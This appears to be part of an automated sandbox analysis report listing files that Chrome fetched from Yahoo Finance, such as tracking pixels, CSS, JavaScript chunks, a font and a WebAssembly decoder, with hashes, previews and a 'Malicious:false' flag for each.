                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2C1B575D37A0ABCCE3FE9DF102E328FECC366E931B31F72A39E883CD21456E47BEB1AC5F38F0CFE527E3941EFC067DA6D3274B5705DE11390BCF9FB2C83315D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{c as t}from"./contextUtil.DIxB3t2m.js";const r=t("ad-constraint");export{r as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=zeta_global_ssp&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&f=i&uid=ua-224dbbae-81e8-387f-873d-9929b1cbe964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:"https://dt.adsafeprotected.com/dt?advEntityId=2233400&asId=38c6b108-4dfa-76fb-59d4-d5cea654b422&tv=%7Bc:qyx6Yj,pingTime:5,time:9426,type:pf,clog:%5B%7Bpiv:0,vs:o,r:r,w:728,h:90,t:111%7D,%7Bpiv:100,vs:i,r:,t:4415%7D%5D,es:0,sc:1,ha:1,fgad:1,fif:0,gmnp:0,for:0,b11:0,cnod:1,gm:0,slTimes:%7Bi:5011,o:4415,n:0,pp:0,pm:0%7D,slEvents:%5B%7Bsl:o,t:111,wc:0.0.1280.984,ac:NaN.NaN.728.90,am:i,cc:NaN.NaN.728.90,piv:0,obst:0,th:0,reas:r,bkn:%7Bpiv:%5B4372~0%5D,as:%5B4372~728.90%5D%7D%7D,%7Bsl:i,t:4415,wc:0.0.1280.984,ac:NaN.NaN.728.90,am:i,cc:NaN.NaN.728.90,piv:100,obst:0,th:0,reas:,bkn:%7Bpiv:%5B5011~100%5D,as:%5B5011~728.90%5D%7D%7D%5D,slEventCount:2,em:true,fr:false,e:,tt:rjss,dtt:1644,fm:uqDOUlz+11%7C12%7C13%7C14%7C151%7C16%7C1711%7C1712%7C1713%7C1714%7C1715%7C1716%7C1717%7C1718%7C1719%7C171a%7C171b%7C171c%7C171d%7C171e%7C171f%7C171g%7C171h%7C171i%7C171j%7C171k%7C172%7C1731%7C1732%7C18%7C19%7C1a1%7C1a2%7C1a3%7C1a4%7C1a5%7C1a6%7C1b%7C1c%7C1d%7C1e%7C1f%7C1g11%7C1g12%7C1g2%7C1h%7C1i%7C1j%7C1k%7C1l1%7C1m%7C1n%7C1o%7C1p%7C1q%7C1r*.2233400-82744863%7C1r1,idMap:1r*,rmeas:1,rend:1,renddet:DIV.qs.sn,siq:121,sis:3872%7D&br=c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1039)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.924207192805264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:CNOQxreQxWQxeBQxTQxk2huFvVv7CgXQIn1jQxk6Qxk7uVQxk2ZzQxYQxzGQxp:CTLvcu2q2oF9Og3kq5qiaq2ZUxtN3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:011F8D29C4816CEC96769152E367FB83
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1608E05E3FD164004A8880B7FBB45B88626BC10F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DA3E637CCD47195E27F50560C33DCBF27F7FC56407227DE4A7F9429D3B490035
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:51A402895D1A7BAA2F5420B9582971931666B65FFB903EBAFE189FAB8CBB1D0C7F1E910CCC714055827A78CA52E14BC97F88223DBCCF0F302BD8226A10E8663B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/SectionHeader.B9ETuNQk.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.mb-0.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-0)}.mb-2.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-2)}.mb-4.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-4)}.mb-6.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-6)}header.yf-13lpgjv.yf-13lpgjv{--_font-size:var(--font-3xl);--_font-weight:var(--font-bold);margin-bottom:var(--mb);display:flex;align-items:center;justify-content:space-between;font-weight:var(--font-bold);text-decoration:none}header.yf-13lpgjv .header.yf-13lpgjv{font-size:var(--_font-size);font-weight:var(--_font-weight);line-height:1.25}header.yf-13lpgjv .header.ellipsis.yf-13lpgjv{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}header.small.yf-13lpgjv.yf-13lpgjv{--_font-size:var(--font-xl)}header.x-small.yf-13lpgjv.yf-13lpgjv{--_font-size:var(--font-l);--_font-weight:var(--font-bold)}header.medium.yf-13lpgjv.yf-13lpgjv{--_font-size:var(--font-3xl)}header.desc.yf-13lpgjv.yf-13lpgjv{--mb:var(--space-2)}:not(header).desc.yf-13lpgjv.yf-13lpgjv{margin-bottom:var(--mb)}.clickToViewMore.yf-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (41946)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):101636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.205738326913124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:HQTvXCtqx/4xvBrd55RxqYIL6P/+4B6ZdcXOQD:wjSBwYIL6P/+hcD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6DE997911DDACF8F746DEEF8FA75CA83
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A60C1BB0B4A25BDF2B01F6E205F0E4DCAAD03BCC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:79B8EBA8F4994C808ADF7F9D501A2208F16460D7B966458C09416FCCF31DE3E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8F629463540747D02166D0F51D8644D311ED18503B6DD143F17A380304194CCCD6220627FCA45FA203B4DC6B910A651BEECE20205ACB42E7C1F709B02E3E2BA2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["../nodes/0.B28TE-jB.js","../chunks/scheduler.Dr9AAxFe.js","../chunks/index.DCSmZEjO.js","../nodes/1.oDKH-Qqj.js","../chunks/stores.DPDRpTFd.js","../chunks/43.CtYdpA_T.js","../chunks/control.CYgJF_JY.js","../nodes/2.ByyLg9CL.js","../chunks/commonUtil.CI22_Irn.js","../chunks/PageProgressBar.BGwewH1i.js","../chunks/ads.DhuB_mth.js","../chunks/preload-helper.D6kgxu3v.js","../chunks/globals.D0QH3NT1.js","../chunks/i13nUtil.C-uBpR7k.js","../chunks/index.rV6zwFgL.js","../chunks/each.BExQfwb4.js","../chunks/spread.CgU5AtxT.js","../assets/PageProgressBar.DFY6QScX.css","../chunks/Ads.Bxzxpy-0.js","../chunks/AdGroup.CD4BTzLP.js","../chunks/intersectUtil.DVqOQxux.js","../chunks/context.BGtg7DvY.js","../chunks/contextUtil.DIxB3t2m.js","../assets/AdGroup.53S-Eidu.css","../chunks/Header.Db1Xn_Q6.js","../chunks/RMP.DAY9oSd8.js","../assets/Header.BvCA0Mhu.css","../chunks/Link.Cll6KZpb.js","../chunks/Icon.BSWt_jx8.js","../assets/Icon.DgFg0-NP.css","../assets/Link.CHR7GGSC.css","
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1992)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.345070723591131
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:JlcAN6p9KC9ACcStwPi/pnTEd7pUc+vX3PCJFhIBXqvn:J9gQC9ttkwpnA8zfPngvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:67BDAF6EA7308198B02103BB5F6C2A12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AA69CBE41DD2CBE8D04BFABE54A890880D381566
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C26DBECD8F8E14BACDFE157A1DF367A644922111E859A0D015A07737C3362DB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:093F45E5F89576CF4D5F0259CD531C58DCBEAFC5C80E227426A59012FABD868FA36CCBC9E298449B37C523CCEF0060F4BB5E878C2B8E336589965F6B6EE95111
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as h,e as v,d as b,f as k,i as p,q as d,U as g,k as y,c as w,u as I,g as N,a as S,n as q}from"./scheduler.Dr9AAxFe.js";import{S as z,i as E,g as B,a as u,e as C,t as _,c as D,b as H,m as M,d as T}from"./index.DCSmZEjO.js";import{I as U}from"./Icon.BSWt_jx8.js";/* empty css */const V='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill-rule="evenodd" d="M4 11h16v2H4z"/></svg>';function j(o){let t;const s=o[4].default,e=w(s,o,o[3],null);return{c(){e&&e.c()},l(a){e&&e.l(a)},m(a,l){e&&e.m(a,l),t=!0},p(a,l){e&&e.p&&(!t||l&8)&&I(e,s,a,a[3],t?S(s,a[3],l,null):N(a[3]),null)},i(a){t||(_(e,a),t=!0)},o(a){u(e,a),t=!1},d(a){e&&e.d(a)}}}function A(o){let t,s;return t=new U({props:{icon:V,size:"large",type:"tertiary"}}),{c(){D(t.$$.fragment)},l(e){H(t.$$.fragment,e)},m(e,a){M(t,e,a),s=!0},p:q,i(e){s||(_(t.$$.fragment,e),s=!0)},o(e){u(t.$$.fragment,e),s=!1},d(e){T(t,e)}}}function F(o){let t,s,e,a,l;const f=[A,j],r=[];function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), CFF, length 48340, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):48340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.995961948732514
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:sz46HkuLMNLrB62h1Wozok6WM6MWNFegbBJd2RQul8JwkH5QmfwKXPCkkAhHCUI3:A4EkuL0n1hck6VpW9b4RnlEwoQE9UA9U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:775987BE3C804E87E03973D02B25D0E8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D4DB949358DF33AB0EDAD20375DAC018586FF1BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:328A01FA8476EBAE49A4D78CCF488E652C084CF8F0E30439335ECCC3360F9A25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:81A6DEEEE8B322AA616172A2BCD9E78B5C0D9AC06B0696D390486C1CCA9C3F67F9968315E5B4381856E2B1FEF5C26490E64ED029F7D7CD1E903A5CE35675137C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cv/apiv2/finance/gtfont/GT-America-Bold.woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:wOF2OTTO..........WH...............................j.j...2..h.`....6.$..(....u. [nV...c.N6.T..nC....^....IH.my..7'):`..D...'2........%._..m...8...i...SJ!............"..;6.s.u.k.E.V.G......x.p.@J.&b..E.YI.G.E..jjQ.cs.dh.X.t.O..w..*..p*..E.Tr....q....[...<TR%UR%...Q..k).....K.k.).if...f..Wr..f..zRl.:..J...;..T,.cM&.4.63.*...h)/../ts..&%..Xh.L.l.}...3.......@G3.pt..D...@ZO......(.u..S_?%.yOV.7..h\M1A...O}..k6.>..b.C.T.U..b3..h....C.6TS[U..g.a...L....hHW......S./n....JD..N.?....=.-.K..c.0@0..1z(.UC..#.f.....E>.o .....^`..%.0]...Hk*.2.).>FF..S...G/..L....ECu..i|d..[....e..+..V.m.....A...+.....N<..YWF....;.B.........[>.u..[f.....oO.....$.1. ...2A..|...?....O.@......@.f.D./..!..K.H.:zV>.O. ..............Q..V!.5...,H....?].9.=v.}U}....:b.h..3"".!.3">b.....1b....D.8.ngu...TbGN.S...S.&...H..}...a..@S_g m..T..J.,.....O...j.u...]....S.F.....N4c..C."...0$...1.4....N.....A.Lur.\....+W...z...W..B....0-....k.<&Mr...>........P.C...#.$.Mcp.p Y.U.$.d;.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):237
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.578085753393818
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:5XA9QzLtLgVxXAbuGMLoa7ARQXA9QzLsJLn:RA2J0VJAbm7AR2A2M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FDF1FC8FE6BC6D08523F7958B8EDF2B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:64BFDD0AF4AC4C7B85D70D469D6BA14D931E15F9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1BA4AEFDEE0BB016C7BD948333B442DE969C615B101F54686DE08ADAD125F4FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F630F5614C5E7F47C020D5E24F0883E4C89CFF47ADB7BD67D8378F36A7B75075FB08358D9D97CF1936FAE293C3F07B2B315D72801A2687DF48A888EC857EF138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/fp/css/react-wafer-shopping.custom.desktop.fdf1fc8fe6bc6d08523f7958b8edf2b5.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.shopping-product:hover .shopping-caption-container{width:155px!important}.shopping-product:hover .shopping-caption{opacity:1!important}@media (max-width:1190px){.shopping-product:hover .shopping-caption-container{width:125px!important}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):281481
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.316916763690954
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:zD4xJtMCTEmv9zg/nD6RBtEdKxpokJijli+yxpokJijE/+RfatsDCRxSqefatsD9:zD4IsSUK761uUWP3B62bP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07458752C1AC837FCEE9288DAC8D3C5B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C1FCD210C8BFEFEC53CA0AB922409FD5B806CA41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:92322D1CABAA55C8E216C983E58670043B063AF59D86A7B6AE8201452FF7987F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1D32CB31350619B05834E9B95E968B86D7EFB9B738B5D7584E25AFE959580AD160FA926C81EA9EC4917F86DBFE651AAF831E2DEDDDF0AA4CDDC438FBAB19C6AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://www.gstatic.com/draco/versioned/decoders/1.3.6/draco_decoder.wasm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.asm.......#`....`.....`...`......`....`.....`...`.......`......`.........`........`..`.......`........`..|......`..~..~`.........`..~~..`..........`...~..`.~...`....}`......~.`.....}.`...~.`..~.`.}}..`...|......`..}...`.~....`...}`....|`.....|`.~~.|`.|..|.....env.__cxa_allocate_exception...env.__cxa_throw...wasi_unstable.fd_write...wasi_unstable.fd_close...wasi_unstable.environ_sizes_get...wasi_unstable.environ_get...env.abort...env.emscripten_resize_heap...env.emscripten_memcpy_big...env.setTempRet0...wasi_unstable.fd_seek...env.memory.....env.table.p...................................................................................................... ..................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=teadstv_dbm&google_hm=NTkyMzE4NWQtMGZjZi00YTNkLTkwMmItMTBjNDBiYTUxZjRh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):443334
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.362717320035016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:UrvhlOs6mzFal1/+66a2N0iRaQrfyuGSiG4E3WSZHDsHZQV9iCgXb/aItD7ZtbAC:Ur3tjK+j9pa4gJzD9qu9kUniHeZN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DA4EE02D000236C004B547C7991FD8E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0F0A12409C58257688688295D97539CE64BDBB31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D25BC1FCA98C69A3636299640F99FC4C71C81B7A1EF6609374A2D8C04D758A37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1AD149F445A7917FEB218D9FFE93B7A8223AF5DF4B148E05555B4E9E41A59DDF1D4AD049D076F3CB247FCA914DD654A7FA7FCCFBA9C06963482E08413637E579
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.assertive=window.assertive||{};window.assertive.floorPriceVersion='11.9.1_8Tue_16';window.assertive.x771977720=(function(){var a=(function(){var a=[["(?<!motorola )Edge[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgiOS[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgA[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["Edg[ /](\\d+[\\.\\d]+)","Microsoft Edge"],[".*Servo.*Firefox(?:/(\\d+[\\.\\d]+))?","Firefox"],["(?!.*Opera[ /])Firefox(?:[ /](\\d+[\\.\\d]+))?","Firefox"],["(?:BonEcho|GranParadiso|Lorentz|Minefield|Namoroka|Shiretoko)[ /](\\d+[\\.\\d]+)","Firefox"],["CrMo(?:/(\\d+[\\.\\d]+))?","Chrome Mobile"],["Chrome(?:/(\\d+[\\.\\d]+))? Mobile","Chrome Mobile"],["Chrome(?!book)(?:/(\\d+[\\.\\d]+))?","Chrome"],["(?:(?:iPod|iPad|iPhone).+Version|MobileSafari)/(\\d+[\\.\\d]+)","Mobile Safari"],["(?:Version/(\\d+\\.[\\.\\d]+) .*)?Mobile.*Safari/","Mobile Safari"],["(?:iPod|(?<!Apple TV; U; CPU )iPhone|iPad)","Mobile Safari"],["Version/(\\d+\\.[\\.\\d]+) .*Safari/|(?:Safari|Safari(?:%20)?%E6%B5%8F%E8%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5257351171929923
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
